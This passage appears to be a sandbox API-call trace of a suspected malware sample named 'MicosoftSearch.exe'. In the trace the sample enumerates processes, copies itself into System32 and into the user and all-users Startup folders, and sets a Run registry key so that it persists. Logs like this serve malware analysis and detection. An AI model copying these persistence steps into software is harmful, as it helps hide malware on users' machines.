szExeFile="electronic.exe")) returned 1 [0031.826] lstrlenW (lpString="electronic.exe") returned 14 [0031.826] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0031.827] lstrlenW (lpString="regression.exe") returned 14 [0031.827] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0031.827] lstrlenW (lpString="county.exe") returned 10 [0031.827] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0031.828] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0031.828] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.828] lstrlenW (lpString="dllhost.exe") returned 11 [0031.828] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.829] lstrlenW (lpString="dllhost.exe") returned 11 [0031.829] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0031.830] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0031.830] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 0 [0031.830] CloseHandle (hObject=0xe0) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb7d148 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb7d190 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8ea90 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8eab0 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8eaf8 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8e288 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6c740 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6c778 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd78 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6c7c0 | out: hHeap=0xb10000) returned 1 [0031.830] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cda0 | out: hHeap=0xb10000) returned 1 [0031.830] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xb93b90 [0031.831] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xba3b98 [0031.831] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.831] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cda0 [0031.831] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cda0, Size=0x40) returned 0xb7d190 [0031.831] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.831] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cda0 [0031.831] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.831] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cd78 [0031.831] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.831] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cd50 [0031.831] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d148 [0031.831] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xba3b98, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe")) returned 0x38 [0031.831] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbb3ba0 [0031.832] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbc3ba8 [0031.832] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.832] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cd50 [0031.832] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d2b0 [0031.832] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d2b0, Size=0x80) returned 0xb8fbe0 [0031.832] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8fbe0, Size=0x100) returned 0xb90490 [0031.832] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.832] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90490 | out: hHeap=0xb10000) returned 1 [0031.832] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\MicosoftSearch.exe", lpDst=0xbb3ba0, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\MicosoftSearch.exe") returned 0x27 [0031.832] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc3ba8 | out: hHeap=0xb10000) returned 1 [0031.832] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb3ba0 | out: hHeap=0xb10000) returned 1 [0031.832] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x2730020 [0031.833] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.833] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cd50 [0031.833] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.833] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6d0e8 [0031.833] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.833] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.833] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x0) returned 1 [0031.833] lstrlenW (lpString="kernel32.dll") returned 12 [0031.833] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.833] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.833] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0031.833] CreateFileW (lpFileName="C:\\Windows\\System32\\MicosoftSearch.exe" (normalized: "c:\\windows\\system32\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0031.834] ReadFile (in: hFile=0xe0, lpBuffer=0x2730020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesRead=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0031.849] WriteFile (in: hFile=0xe4, lpBuffer=0x2730020*, nNumberOfBytesToWrite=0x5e400, lpNumberOfBytesWritten=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesWritten=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0031.856] ReadFile (in: hFile=0xe0, lpBuffer=0x2730020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesRead=0x18fd04*=0x0, lpOverlapped=0x0) returned 1 [0031.856] CloseHandle (hObject=0xe4) returned 1 [0031.862] CloseHandle (hObject=0xe0) returned 1 [0031.862] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.862] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6d0e8 [0031.862] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.862] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6cd50 [0031.862] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.862] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.862] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0031.862] lstrlenW (lpString="kernel32.dll") returned 12 [0031.862] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.862] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.862] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.862] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2730020 | out: hHeap=0xb10000) returned 1 [0031.867] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.867] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6d0e8 [0031.867] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6d0e8, Size=0x40) returned 0xb7d2b0 [0031.867] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d2b0, Size=0x80) returned 0xb8fbe0 [0031.867] lstrlenW (lpString="C:\\Windows\\System32\\MicosoftSearch.exe") returned 38 [0031.867] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0031.867] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x5c) returned 0xb90490 [0031.867] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fcd8 | out: phkResult=0x18fcd8*=0xe0) returned 0x0 [0031.867] RegSetValueExW (in: hKey=0xe0, lpValueName="MicosoftSearch.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\MicosoftSearch.exe", cbData=0x4c | out: lpData="C:\\Windows\\System32\\MicosoftSearch.exe") returned 0x0 [0031.868] RegCloseKey (hKey=0xe0) returned 0x0 [0031.868] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90490 | out: hHeap=0xb10000) returned 1 [0031.868] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0031.868] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8fbe0 | out: hHeap=0xb10000) returned 1 [0031.868] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbb3ba0 [0031.868] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbc3ba8 [0031.868] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.868] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e288, Size=0x20) returned 0xb6d0e8 [0031.868] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6d0e8, Size=0x40) returned 0xb7d2b0 [0031.869] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d2b0, Size=0x80) returned 0xbd3bc8 [0031.869] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3bc8, Size=0x100) returned 0xb90490 [0031.869] lstrlenW (lpString="") returned 0 [0031.869] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.869] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8c) returned 0xb8fbe0 [0031.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0xe0) returned 0x0 [0031.869] RegQueryValueExW (in: hKey=0xe0, lpValueName="Startup", lpReserved=0x0, lpType=0x18fc90, lpData=0xbc3ba8, lpcbData=0x18fcbc*=0x7fff | out: lpType=0x18fc90*=0x0, lpData=0xbc3ba8*=0x53, lpcbData=0x18fcbc*=0x7fff) returned 0x2 [0031.869] RegCloseKey (hKey=0xe0) returned 0x0 [0031.869] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8fbe0 | out: hHeap=0xb10000) returned 1 [0031.869] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.869] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8c) returned 0xb8fbe0 [0031.869] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0xe4) returned 0x0 [0031.869] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fc90, lpData=0xbc3ba8, lpcbData=0x18fcbc*=0x7fff | out: lpType=0x18fc90*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fcbc*=0x98) returned 0x0 [0031.869] RegCloseKey (hKey=0xe4) returned 0x0 [0031.869] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8fbe0 | out: hHeap=0xb10000) returned 1 [0031.869] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0031.869] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.869] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90490 | out: hHeap=0xb10000) returned 1 [0031.870] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", lpDst=0xbb3ba0, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe") returned 0x6f [0031.870] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc3ba8 | out: hHeap=0xb10000) returned 1 [0031.870] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb3ba0 | out: hHeap=0xb10000) returned 1 [0031.870] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x2730020 [0031.870] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.870] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6d0e8 [0031.870] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.870] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd50 [0031.870] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.870] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.870] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0031.870] lstrlenW (lpString="kernel32.dll") returned 12 [0031.870] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.870] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.870] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0031.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0031.877] ReadFile (in: hFile=0xe4, lpBuffer=0x2730020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesRead=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0031.889] WriteFile (in: hFile=0xe8, lpBuffer=0x2730020*, nNumberOfBytesToWrite=0x5e400, lpNumberOfBytesWritten=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesWritten=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0031.895] ReadFile (in: hFile=0xe4, lpBuffer=0x2730020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesRead=0x18fd04*=0x0, lpOverlapped=0x0) returned 1 [0031.895] CloseHandle (hObject=0xe8) returned 1 [0031.898] CloseHandle (hObject=0xe4) returned 1 [0031.898] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.898] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd50 [0031.898] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.898] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6d0e8 [0031.899] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.899] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.899] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0031.899] lstrlenW (lpString="kernel32.dll") returned 12 [0031.899] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.899] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.899] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.899] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2730020 | out: hHeap=0xb10000) returned 1 [0031.903] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbb3ba0 [0031.903] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbc3ba8 [0031.903] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.904] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd50 [0031.904] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d2b0 [0031.904] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d2b0, Size=0x80) returned 0xbd3bc8 [0031.904] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3bc8, Size=0x100) returned 0xb90490 [0031.904] lstrlenW (lpString="") returned 0 [0031.904] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.904] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8c) returned 0xb8fbe0 [0031.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0xe4) returned 0x0 [0031.904] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fc90, lpData=0xbc3ba8, lpcbData=0x18fcbc*=0x7fff | out: lpType=0x18fc90*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fcbc*=0x78) returned 0x0 [0031.904] RegCloseKey (hKey=0xe4) returned 0x0 [0031.904] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8fbe0 | out: hHeap=0xb10000) returned 1 [0031.904] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0031.904] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.904] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90490 | out: hHeap=0xb10000) returned 1 [0031.904] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", lpDst=0xbb3ba0, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe") returned 0x50 [0031.904] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc3ba8 | out: hHeap=0xb10000) returned 1 [0031.904] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb3ba0 | out: hHeap=0xb10000) returned 1 [0031.904] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x2730020 [0031.904] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.904] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd50 [0031.904] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.904] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6d0e8 [0031.904] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.905] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.905] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0031.905] lstrlenW (lpString="kernel32.dll") returned 12 [0031.905] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.905] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.905] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0031.905] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0031.907] ReadFile (in: hFile=0xe4, lpBuffer=0x2730020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesRead=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0031.919] WriteFile (in: hFile=0xe8, lpBuffer=0x2730020*, nNumberOfBytesToWrite=0x5e400, lpNumberOfBytesWritten=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesWritten=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0031.925] ReadFile (in: hFile=0xe4, lpBuffer=0x2730020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x2730020*, lpNumberOfBytesRead=0x18fd04*=0x0, lpOverlapped=0x0) returned 1 [0031.925] CloseHandle (hObject=0xe8) returned 1 [0031.928] CloseHandle (hObject=0xe4) returned 1 [0031.928] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.928] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6d0e8 [0031.928] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.929] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd50 [0031.929] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.929] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.929] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 